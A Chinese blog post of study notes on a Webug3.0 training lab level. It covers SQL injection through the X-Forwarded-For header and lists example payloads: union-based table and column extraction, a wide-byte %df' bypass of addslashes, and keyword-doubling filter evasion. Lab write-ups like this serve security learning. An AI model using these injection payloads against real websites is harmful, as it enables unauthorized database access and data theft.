webug3.0 第五关笔记

最新推荐文章于 2022-02-20 16:47:05 发布
最新推荐文章于 2022-02-20 16:47:05 发布
阅读量317 收藏
点赞数
分类专栏: 信息安全学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43460822/article/details/95631373
版权

题目:

 (1)头注入的方法和位置的主要关注点在:X-Forwarded-For、User-Agent、Referer这几个地方,抱着“但愿没有注入防护”的想法,对这几个地方都进行了简单的注入测试,发现X-Forwarded-For存在注入

 

(2)则可判断 X-Forwarded-For存在注入,然后可以注入X-Forwarded-For:union select 1,2,3,flag from flag,

 

就可以得到最后注入结果

知识补充:

1、X-Forwarded-ForXFF)是用来识别通过HTTP代理负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段

2.User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。

3.Referer https://www.cnblogs.com/bukudekong/p/3829852.html

4.常见注入类型

(1).常规注入

获取表名----------------
http://xxxxxx/sql1/index.php?id=1' union select 1,2,table_name from information_schema.tables where table_schema=database()%23
获取列名----------------
http://xxxxxx/sql1/index.php?id=1' union select 1,2,column_name from information_schema.columns where table_name='flag'%23
获取信息----------------
http://xxxxxx/sql1/index.php?id=1' union select 1,2,flag from flag%23

(2).宽字节注入

%df'会成为一个中文字符(也就是吃掉\,绕过过滤addslashes函数的规则)
http://xxxxxx/sql2/index.php?id=1%df' union select 1,2,flag from flag %23

(3).关键字替换

以替换关键字的方式过滤,只替换一次,故可将关键字插入来达到绕过目的
http://xxxxxx/sql3/index.php?id=1' uniunionon selselectect 1,2,flag frfromom flag %23

 

参考:

1. 常见注入类型 : https://www.jianshu.com/p/18e94eb06c2a

2.  Exp10 Final 类CTF(Webug3.0漏洞靶场—渗透基础) :https://www.cnblogs.com/PegasusLife/p/10886420.html

 

 

 

liuhandong-99
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Webug靶场平台下载以及安装教程
liver100day的博客
04-19 6285
Webug靶场平台下载以及安装教程 一.基础介绍 WeBug 名称定义为”我们的漏洞”靶场环境 ,基础环境是基于 PHP/mysql 制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。在 webug3.0 发布后的四百多天 226安全团队终于在大年初二发布了 webug 的 4.0 版本。 二.详细操作解析 1.安装需要使用到VM,这里附上VM的官网
webug3.0第二第五笔记(黑客训练)
weixin_43460822的博客
07-11 481
第二:从图片中你能找到什么 题目: (1)题目只给一张图片,所以猜测flag隐藏在图片中,那就直接binwalk进行一下文件分析,果然藏了一个压缩包文件。 (2)用 binwalk -e 123.jpg 命令,提取其中的文件,得到一个txt文件,如下图所示 (3)打开txt文件,txt中只有“密码123”这几个字,作为flag进行提交,显示flag错误。 ...
我的Webug通之路:第五(基础篇)
weixin_45822019的博客
03-15 213
第一步:进行观察提示确定这是一个头注入,具体是什么类型的头注入需要测试 ①测试User-Agent ②测试XFF 第二步:发现注入点,进行利用 ①猜解列数 ②报数据库名 ③不知什么原因,爆完库名后不能继续爆表名,无法向下进行 ④经过网上查攻略,发现这样的语句可以爆出flag,但不知道为什么。 ...
webug 4.0 第五 过滤注入
ONS_cukuyo的博客
04-19 1262
感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.webug.org...
我的webug通之路:第五(中级篇)
weixin_45822019的博客
04-21 240
一、卡题目 题目提示是一个时间注入漏洞 二、打开题目 三、我们输入时间盲注的语句检测一下 四、由于时间注入的手工检测方式必须要一下一下比对或者是用二分法,都特别的费时,此刻就可以使用我们的SQLmap来进行注入 爆数据库: 结果: 爆表名: 爆flag表的列名: 获取flag字段的内容: 五、在网上看到了一个自己写的Python的脚本来进行时间的盲注,在此处粘下来,一起学习...
PS基础第五笔记 PS基础第五笔记
最新发布
03-10
PS基础第五笔记
曼昆第五版经济学原理笔记整理.pdf
12-29
曼昆第五版经济学原理笔记整理
vue3.0基础语法的练习笔记
02-07
Vue 3.0 基础语法实践笔记 Vue 3.0 是一个革命性的前端框架,提供了许多新的语法和功能,本笔记将对 Vue 3.0 的基础语法进行实践和总结。 Vite Vite 是 Vue 3.0 的一个新的开发服务器,取代了传统的 Webpack。...
VUE3.0学习实战笔记.rar
06-28
VUE3.0学习实战笔记
Bootstrap3.0学习笔记之表格相
09-22
Bootstrap3.0是世界上最受欢迎的前端开发框架之一,它提供了丰富的预定义样式,使得构建美观且响应式的网页变得更加容易。本篇文章将详细讲解Bootstrap3.0中的表格组件,包括其不同类型的表格及其应用场景。 首先,...
UG3.0_win7_64位下的启动及安装
11-06
UG3.0_win7_64位下的启动及安装
ug3.0安装方法___一个最好的安装教程
06-06
ug3.0安装时时不是遇到好多的问题 , 总是出现装不上呢? 或是用不了 这个教程能解决!我也按照其他的方法装了 可惜用不了, 按照这个一装,ok!
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
Webug3.0-中级通记录(第一第五)
baynk的博客
12-03 532
0x00 前言 哎,windows的apache,还有php的版本,简直太难了。。。 0x01 第一:出来点东西吧 这没什么东西,就是一个任意文件读取,这里是windows环境下,也没有啥/etc/passwd需要读,读个php的文件得了。 这随你选什么都可以,但是在包含文件的时候,我发现包含php.ini并不能成功,但是包含php.gif却成功了。又想起之前xxe的时候,包含某一些文件时...
webug3.0下载环境搭建使用
Gjqhs的博客
02-20 1547
打开文件类型为虚拟机配置的文件 启动 查看(靶机)IP
Vulnhub靶机第五
L1928的博客
08-29 201
Vulnhub靶机 Lazysysadmin 靶机与攻击机kali 均运行于vm 并且均设置为net模式 使用nmap 扫描获得靶机ip:192.168.238.137 详细扫描一下发现靶机开启了ssh、web、smb等服务 访问ip 没有发现有用信息 准备使用御剑爆破目录 然而爆破失败 改用dirbuster爆破目录 最终发现了Backnode_files wordpress phpmyadmin等重要的目录 准备挨个访问 猜测wordpress中的togle为数据库账户用nmap 扫描
ctf实战 掌控安全的靶场 第五记录
wh1te 小白的博客
09-27 1096
题目 cookie上一获得了 就直接在开发者工具里自己修改cookie即可,我用的火狐直接修改就是了(f12)  将名称改为上一获得的cookie名,值改为上一得到的cookie值 修改好了点击“准备好了即可” 查看可以上传文件类型 发现可以上传cer文件可以利用iis6.0漏洞进行上传asp木马后缀名改为.cer  用菜刀上传即可 在产品管理中可以修改 文件图片 ...
WeBug3.0靶场环境搭建与搭建资源分享
weixin_43460822的博客
07-06 3812
前言:这是我第一次接触WeBug靶场,以前也没有任何于信息安全方面的基础,骨头虽硬,但还是得咬紧牙去啃它,收获到的东西也必然很多。这是一遍于初次认识WeBug靶场,初入靶场,请各位大佬轻喷。 一、WeBug3.0的基本了解 webug名称定义为“我们的漏洞”靶场环境,基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏...
Webug3.0 初级攻略 1-16
安全解决方案
02-27 2556
虚拟机下载路径: 链接:https://pan.baidu.com/s/19234CirAiVf3H820uWWNeg  提取码:7jfs  第一:很简单的一个注入   使用firefox 可以使用一个叫hackbar的插件,方便注入语句的测试 1.提交 ' 报错,可能存在注入点   还是一个字符型的注入漏洞 测试语句:http://172.27.73.13/pentes...
spring_mvc学习笔记
05-20
我的spring mvc学习笔记主要包括学习过程中遇到的问题和相应的解决方法。在学习spring3.0.x的过程中,我发现新特性接触不少,但我更感兴趣的是spring mvc这一块。3.0版本的mvc与2.5版本有着明显的不同,我利用maven2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值